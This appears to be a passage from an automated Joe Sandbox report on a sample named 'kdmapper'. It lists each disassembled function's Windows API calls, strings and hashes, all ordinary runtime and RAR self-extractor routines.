FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00DF1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00DF1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00DF12CF
__aullrem.LIBCMT ref: 00DF1379

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: dbdea8c2392905e3056da34f28e7d2d8d1a8c50581a0708acbaa71499005d8f0
Instruction ID: f3e5eee454d78a4296b83ec91f2011e0e5c77a49832d24c92a111b76992aa323
Opcode Fuzzy Hash: dbdea8c2392905e3056da34f28e7d2d8d1a8c50581a0708acbaa71499005d8f0
Instruction Fuzzy Hash: A14108B5508345AFC710DF65C8849ABBBF9FF88314F04892EF696D2210E734E649CB62

Function 00DE2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00DE2536

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0

Strings

x%u, xrefs: 00DE26FD
xc%u, xrefs: 00DE275A
;%u, xrefs: 00DE2523

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 9aea46286de729e5a73882b4960e3ae8ea18b1c61e9e1c75329bc89364975269
Instruction ID: ae7b058cefe3ae519730a6ca3afcf6de1697cf1416ce857fe3dc53d9ac661dca
Opcode Fuzzy Hash: 9aea46286de729e5a73882b4960e3ae8ea18b1c61e9e1c75329bc89364975269
Instruction Fuzzy Hash: 24F104716043C09BDB25FB2A88D5BFA77D9AB94300F0C456DED8A9B283CB648945C772

Function 00DF9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DF9D0A

Strings

</p>, xrefs: 00DF9DE8
<br>, xrefs: 00DF9DFE
<style>, xrefs: 00DF9E30
>, xrefs: 00DF9D4B
</style>, xrefs: 00DF9E52

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: cbd5fdb18fecc64b20bb74d659809a1a4439be947ee61b05c5ea4b1417761006
Instruction ID: 964c75f78bf4e8ff619c8560fa5a2e3e00cf229cd50ea9c804e17a4437bd4544
Opcode Fuzzy Hash: cbd5fdb18fecc64b20bb74d659809a1a4439be947ee61b05c5ea4b1417761006
Instruction Fuzzy Hash: 4151D566E4132A95DB309A259C31776F3E4DFA1750F6EC42AFBC19B2C0FB658C818271

Function 00E0F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00E0FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00E0F6CF
__fassign.LIBCMT ref: 00E0F74A
__fassign.LIBCMT ref: 00E0F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00E0F78B
WriteFile.KERNEL32(?,00000000,00000000,00E0FE02,00000000,?,?,?,?,?,?,?,?,?,00E0FE02,00000000), ref: 00E0F7AA
WriteFile.KERNEL32(?,00000000,00000001,00E0FE02,00000000,?,?,?,?,?,?,?,?,?,00E0FE02,00000000), ref: 00E0F7E3

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 5c00b5383f4ad8e93bb5494b77810e12df88a4630b04da5deb9655c8ef156aba
Instruction ID: 17295275bd3b5f66c6cd8d382ed400bd661c5dda94f7d6864d606d030c12b7a9
Opcode Fuzzy Hash: 5c00b5383f4ad8e93bb5494b77810e12df88a4630b04da5deb9655c8ef156aba
Instruction Fuzzy Hash: 2751C8B1E002099FCB24CFA4DC45AEEBBF4EF09300F14916AE555F7291D770AA95CBA0

Function 00DFCE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00DFCE9D

Part of subcall function 00DEB690: _wcslen.LIBCMT ref: 00DEB696

_swprintf.LIBCMT ref: 00DFCED1

Part of subcall function 00DE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DE40A5

SetDlgItemTextW.USER32(?,00000066,00E2946A), ref: 00DFCEF1
_wcschr.LIBVCRUNTIME ref: 00DFCF22
EndDialog.USER32(?,00000001), ref: 00DFCFFE

Strings

%s%s%u, xrefs: 00DFCEC6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: f756a05d5749a0bc1d1e1a6c48634719245055ac9e4bb496709f94a292203382
Instruction ID: a3981e7f37d99b381d11e1031e39fba3daae08580ab71986bc526b902fee96d9
Opcode Fuzzy Hash: f756a05d5749a0bc1d1e1a6c48634719245055ac9e4bb496709f94a292203382
Instruction Fuzzy Hash: F84181B190025DAADF21AB61DC45AFA77FDEF05300F45C0A6FB09E7041EA719A858F71

Function 00E02900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00E02937
___except_validate_context_record.LIBVCRUNTIME ref: 00E0293F
_ValidateLocalCookies.LIBCMT ref: 00E029C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00E029F3
_ValidateLocalCookies.LIBCMT ref: 00E02A48

Strings

csm, xrefs: 00E029DD

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
Instruction ID: f7e1a960f837755cfcb0f6258cc74b065782aea1981d7907611550ba4bf8d7c5
Opcode Fuzzy Hash: 3990cf47e4ddea7e7ee314490b44e232410c77fc6b1d5872539660ffd756b968
Instruction Fuzzy Hash: 1041D434A00208AFCF14DF68C889ADEBBF5AF84328F149159E9157B3D2D7319A85CB90

Function 00DF9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00DF9EEE
GetWindowRect.USER32(?,00000000), ref: 00DF9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00DF9FDB
SetWindowTextW.USER32(?,00000000), ref: 00DF9FE3
ShowWindow.USER32(00000000,00000005), ref: 00DF9FF9

Strings

RarHtmlClassName, xrefs: 00DF9FA5

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
Instruction ID: 95836e03847abb1ced75751c69a5ef756c4a3c8135dad1405ba5436215ac3191
Opcode Fuzzy Hash: 3530b7c5c96ab671db133af0515038e23e6cf2fb76a833e1e3a25ec7f9fc8336
Instruction Fuzzy Hash: C1410271405314AFCB215F75EC48F2BBBA8FF48301F098558FA4AA9156CB30E94ACB71

Function 00DF9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DF995E
_wcslen.LIBCMT ref: 00DF9993

Strings

<br>, xrefs: 00DF99DF
 , xrefs: 00DF9A21
, xrefs: 00DF99B0
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00DF9987

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 9f7236f5074be272b90599fd6254192b076f47a7f60c59a527e0fed1c736a16d
Instruction ID: 7564487e82f5bd1a5ee976a5118c0f433fd1b534e5bff1fb2a4af18ebfac960a
Opcode Fuzzy Hash: 9f7236f5074be272b90599fd6254192b076f47a7f60c59a527e0fed1c736a16d
Instruction Fuzzy Hash: DA319072E4434956D630AB549C12B76F3E4EB90320F55C41FF682572C0FBA1ADD183B1

Function 00E0C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E0C868: _free.LIBCMT ref: 00E0C891

_free.LIBCMT ref: 00E0C8F2

Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4

_free.LIBCMT ref: 00E0C8FD
_free.LIBCMT ref: 00E0C908
_free.LIBCMT ref: 00E0C95C
_free.LIBCMT ref: 00E0C967
_free.LIBCMT ref: 00E0C972
_free.LIBCMT ref: 00E0C97D

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 8e10f35ed3343a3394b9c16a458f6938fdc32005fe27ed166d80cbc177edf3cf
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: B0114F71590B06AAE520B7B1DC07FCB7BEC9F00B00F509E15F2DD760D2DA65B5858760

Function 00DFE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00DFE669,00DFE5CC,00DFE86D), ref: 00DFE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00DFE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00DFE630

Strings

KERNEL32.DLL, xrefs: 00DFE600
ReleaseSRWLockExclusive, xrefs: 00DFE625
AcquireSRWLockExclusive, xrefs: 00DFE615

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 35eaee0459f3b1bebd9a1715549e5c7aa00cd3e31ca03da2d0f65e6e692326fc
Instruction ID: 0c37569d433841e624f4fc67ae6e3258def2f91cf2a3dcf4ea4a53919c8d3d5a
Opcode Fuzzy Hash: 35eaee0459f3b1bebd9a1715549e5c7aa00cd3e31ca03da2d0f65e6e692326fc
Instruction Fuzzy Hash: 0DF0AF3278032E9F0F214E765C845B663CA6B2974130A887ADA06F7120EB14C8995BA0

Function 00E08900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E0891E

Part of subcall function 00E08DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34), ref: 00E08DE2
Part of subcall function 00E08DCC: GetLastError.KERNEL32(00E13A34,?,00E0C896,00E13A34,00000000,00E13A34,00000000,?,00E0C8BD,00E13A34,00000007,00E13A34,?,00E0CCBA,00E13A34,00E13A34), ref: 00E08DF4

_free.LIBCMT ref: 00E08930
_free.LIBCMT ref: 00E08943
_free.LIBCMT ref: 00E08954
_free.LIBCMT ref: 00E08965

Strings

p, xrefs: 00E08914

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p
API String ID: 776569668-2678736219
Opcode ID: 31ef9170c8d7029358f2928425bc459d78559086599d45e45111322104d200e8
Instruction ID: 2bbf2e70f1f2c8942662c547af32cbd523ee83b95c67cf210964116fac4962a6
Opcode Fuzzy Hash: 31ef9170c8d7029358f2928425bc459d78559086599d45e45111322104d200e8
Instruction Fuzzy Hash: 8FF03A798201238FC6066F16FE024453FE5F726714381274AFA59723F1CB71498A9B85

Function 00DF146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF14C2

Part of subcall function 00DEB146: GetVersionExW.KERNEL32(?), ref: 00DEB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DF14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DF1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00DF1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DF1533

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: c34ec35143e85b9877919d2e87fe64cc716862ac879ac50ed88e00876b671f3f
Instruction ID: 9c2b0488e08bd0b1cc31501fb7f36cfeb07b4df4ac29917e0cbf1388d78e8796
Opcode Fuzzy Hash: c34ec35143e85b9877919d2e87fe64cc716862ac879ac50ed88e00876b671f3f
Instruction Fuzzy Hash: FE31F779208345AFC700DFA9C88499BBBF8BF98714F008A1EF995D3210E730D509CBA6

Function 00E02AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E02AF1,00E002FC,00DFFA34), ref: 00E02B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E02B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E02B2F
SetLastError.KERNEL32(00000000,00E02AF1,00E002FC,00DFFA34), ref: 00E02B81

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 89cc42451df5f4f6671e6fbd24c3557e5ca887a1a6e549df5629a437263ba471
Instruction ID: a2772586cd826d5278070c60aeb581a5a90e576b5b0d0d0f507bfc2ebf0fe5e7
Opcode Fuzzy Hash: 89cc42451df5f4f6671e6fbd24c3557e5ca887a1a6e549df5629a437263ba471
Instruction Fuzzy Hash: 3D01D8321183126DF6252EB57C8DA9A3BDDEB117B8760673EF610751E0EF114C849544

Function 00E097E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00E21030,00E04674,00E21030,?,?,00E03F73,00000050,?,00E21030,00000200), ref: 00E097E9
_free.LIBCMT ref: 00E0981C
_free.LIBCMT ref: 00E09844
SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E09851
SetLastError.KERNEL32(00000000,?,00E21030,00000200), ref: 00E0985D
_abort.LIBCMT ref: 00E09863

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 5489cbc3dfb522bded446af79b9de6f6451402c73e4789717c01bb632f67421b
Instruction ID: de5a31537ab36e2677648cccc57d3f9808bf0238007b999f464330eef58f7493
Opcode Fuzzy Hash: 5489cbc3dfb522bded446af79b9de6f6451402c73e4789717c01bb632f67421b
Instruction Fuzzy Hash: 83F02D351407016BC6193F35BC05A9F1AE98FD2774F25A134F554B23D3EF2088C64135

Function 00DFDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DFDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFDC72
TranslateMessage.USER32(?), ref: 00DFDC7C
DispatchMessageW.USER32(?), ref: 00DFDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00DFDC91

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
Instruction ID: 30728ca825c9c636aa4d585038c9e1e3aa65bb495c8ba14a5fb5e7d969c6a363
Opcode Fuzzy Hash: c8bbc2effcca0226e26f40a5828eda5ac10757c0a5e5b818a11123c30d2c8021
Instruction Fuzzy Hash: 6BF03C72A01219BBCB206BA6DC4CDDF7F7EEF46791B148121B60AE2051D674864AC7B0

Function 00DEC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

